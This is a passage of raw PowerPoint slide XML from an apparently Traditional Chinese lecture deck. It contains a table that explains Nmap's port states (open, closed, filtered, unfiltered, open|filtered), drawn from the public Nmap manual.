          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>www.google.com.tw</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="投影片編號版面配置區 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42945442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nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="133350" y="1739900"/>
          <a:ext cx="8739187" cy="4360585"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="781358">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2160549935"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7957829">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3198533954"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="291505">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1"/>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                        <a:t>所了解的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
                        <a:t>6</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                        <a:t>個端口狀態      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
                        <a:t>https://</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>nmap.org/man/zh/man-port-scanning-basics.html</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:lnB w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2057767107"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617220">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Open</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>打開</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a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>應用程序順序正確在該端口接收</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>TCP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>連接或</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>UDP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>報文。發現這一點常是端口掃描的主要目標。安全意識強的人知道道每個打開的端口都是攻擊的入口。攻擊者或入侵者想要發現打開的端口。 而管理人員則嘗試關閉它或使用防火牆保護它們以免遭破壞合法用戶。 非安全掃描可能對開放的端口也感興趣，因為它顯示了網絡上那些服務可供使用。</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61284794"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8001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a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>closed(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>關閉的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">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a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>關閉的端口對</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>也是可訪問的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>它接受</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>的探測報告並產生影響</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>，但沒有應用程序在其上監聽。它們可以顯示該</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>地地址上</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>主機發現，或者</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>ping</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>掃描</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>的主機正在運行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>up </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>也對部分操作系統探索有所有幫助。 因為關閉的關口是可以訪問的，也許過會兒值得再掃描一下，可能又開放了。 系統管理員工可能會考慮使用防火牆封鎖這種端口。 那樣他們就會被顯示為被過濾的狀態，下面討論。</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0937157"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="9829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a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>filtered(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>被過濾的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">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a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>由於包過過濾阻止探查報告文到達端口，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>無法確定該端口是否打開。過濾可能來自專業的防火牆設備，路由器規則或者主機上的軟件防火牆。這樣的端口讓攻擊者感覺很撲折，因為它們幾乎不提供任何信息。有時它們響應</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>ICMP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>錯誤消息類型</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>代碼</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>13</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>（無法到達目標標記：通信被管理人員禁止停止），但更普遍的是通過濾器只是丟棄探測桿，不做任何反應。這逼使</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>重新測試若干下次以訪問萬一探測包是由網絡阻擋丟棄的。這使掃描速度明顯變化。</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02494562"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617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a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>unfiltered(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>未被過濾的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>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a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>未被濾過狀態意味著端口可訪問，但</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>不能確定它是打開還是關閉。 只用於鏡像防火牆規則集的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>ACK</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>掃描才會把端口分類到這種狀態。用其類型的掃描如窗口掃描，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>SYN</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>掃描，或者 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>FIN </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>掃描來掃描未被過濾的端口可以幫助確定端口是否打開。</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7532989"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617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err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>open|filtered</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">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a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>當無法確定端口是打開還是被過濾的，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>就應該把端口劃分成這種狀態。打開的端口不響應就是一個例子。沒有響應也可能意味著報文過濾器丟棄了探測報文或者它引發的任何響應。因此</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
